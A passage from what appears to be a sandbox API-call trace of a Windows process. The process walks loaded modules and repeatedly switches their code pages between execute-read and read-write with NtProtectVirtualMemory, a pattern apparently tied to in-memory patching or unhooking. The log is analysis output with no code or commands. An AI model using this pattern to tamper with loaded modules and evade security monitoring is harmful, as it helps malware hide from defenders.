NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d2000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.675] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.676] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1014, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.676] GetCurrentProcess () returned 0xffffffff [0068.676] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1014, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.676] GetCurrentProcess () returned 0xffffffff [0068.676] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1080, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.676] GetCurrentProcess () returned 0xffffffff [0068.676] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1080, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.676] GetCurrentProcess () returned 0xffffffff [0068.676] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f109c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.677] GetCurrentProcess () returned 0xffffffff [0068.677] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f109c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.677] GetCurrentProcess () returned 0xffffffff [0068.677] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f10b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.677] GetCurrentProcess () returned 0xffffffff [0068.677] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f10b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.677] GetCurrentProcess () returned 0xffffffff [0068.677] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f10bc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.677] GetCurrentProcess () returned 0xffffffff [0068.677] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f10bc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.678] GetCurrentProcess () returned 0xffffffff [0068.678] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f10c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.678] GetCurrentProcess () returned 0xffffffff [0068.678] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f10c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.678] GetCurrentProcess () returned 0xffffffff [0068.678] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f10f8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.678] GetCurrentProcess () returned 0xffffffff [0068.678] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f10f8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.678] GetCurrentProcess () returned 0xffffffff [0068.678] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1104, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.679] GetCurrentProcess () returned 0xffffffff [0068.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1104, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.679] GetCurrentProcess () returned 0xffffffff [0068.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f110c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.679] GetCurrentProcess () returned 0xffffffff [0068.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f110c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.679] GetCurrentProcess () returned 0xffffffff [0068.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f111c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.679] GetCurrentProcess () returned 0xffffffff [0068.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f111c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.680] GetCurrentProcess () returned 0xffffffff [0068.680] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1120, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.680] GetCurrentProcess () returned 0xffffffff [0068.680] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1120, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.680] GetCurrentProcess () returned 0xffffffff [0068.680] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1124, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.680] GetCurrentProcess () returned 0xffffffff [0068.680] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1124, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.680] GetCurrentProcess () returned 0xffffffff [0068.680] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1128, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.681] GetCurrentProcess () returned 0xffffffff [0068.681] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1128, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.681] GetCurrentProcess () returned 0xffffffff [0068.681] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1138, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.681] GetCurrentProcess () returned 0xffffffff [0068.681] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1138, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.681] GetCurrentProcess () returned 0xffffffff [0068.681] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1164, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.681] GetCurrentProcess () returned 0xffffffff [0068.681] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1164, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.682] GetCurrentProcess () returned 0xffffffff [0068.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f11b4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.682] GetCurrentProcess () returned 0xffffffff [0068.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f11b4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.682] GetCurrentProcess () returned 0xffffffff [0068.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f11b8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.682] GetCurrentProcess () returned 0xffffffff [0068.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f11b8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.682] GetCurrentProcess () returned 0xffffffff [0068.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f11c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.683] GetCurrentProcess () returned 0xffffffff [0068.683] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f11c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.683] GetCurrentProcess () returned 0xffffffff [0068.683] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f11c8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.683] GetCurrentProcess () returned 0xffffffff [0068.683] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f11c8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.683] GetCurrentProcess () returned 0xffffffff [0068.683] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1208, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.683] GetCurrentProcess () returned 0xffffffff [0068.684] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x772f1208, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x772f1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.684] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.684] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671030, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.685] GetCurrentProcess () returned 0xffffffff [0068.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671030, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.685] GetCurrentProcess () returned 0xffffffff [0068.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671038, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.685] GetCurrentProcess () returned 0xffffffff [0068.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671038, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.685] GetCurrentProcess () returned 0xffffffff [0068.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7567103c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.685] GetCurrentProcess () returned 0xffffffff [0068.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7567103c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.686] GetCurrentProcess () returned 0xffffffff [0068.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671054, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.686] GetCurrentProcess () returned 0xffffffff [0068.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671054, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.686] GetCurrentProcess () returned 0xffffffff [0068.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671058, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.686] GetCurrentProcess () returned 0xffffffff [0068.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671058, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.686] GetCurrentProcess () returned 0xffffffff [0068.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7567105c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.687] GetCurrentProcess () returned 0xffffffff [0068.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7567105c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.687] GetCurrentProcess () returned 0xffffffff [0068.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671064, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.687] GetCurrentProcess () returned 0xffffffff [0068.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671064, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.687] GetCurrentProcess () returned 0xffffffff [0068.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671068, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.687] GetCurrentProcess () returned 0xffffffff [0068.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671068, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.688] GetCurrentProcess () returned 0xffffffff [0068.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671070, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.688] GetCurrentProcess () returned 0xffffffff [0068.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671070, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.688] GetCurrentProcess () returned 0xffffffff [0068.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671078, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.688] GetCurrentProcess () returned 0xffffffff [0068.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671078, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.690] GetCurrentProcess () returned 0xffffffff [0068.690] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7567107c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.690] GetCurrentProcess () returned 0xffffffff [0068.690] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7567107c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.690] GetCurrentProcess () returned 0xffffffff [0068.690] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671080, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.691] GetCurrentProcess () returned 0xffffffff [0068.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75671080, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.691] GetCurrentProcess () returned 0xffffffff [0068.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756710d0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.691] GetCurrentProcess () returned 0xffffffff [0068.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756710d0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.691] GetCurrentProcess () returned 0xffffffff [0068.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756710dc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.691] GetCurrentProcess () returned 0xffffffff [0068.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756710dc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75671000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.692] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.692] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621010, 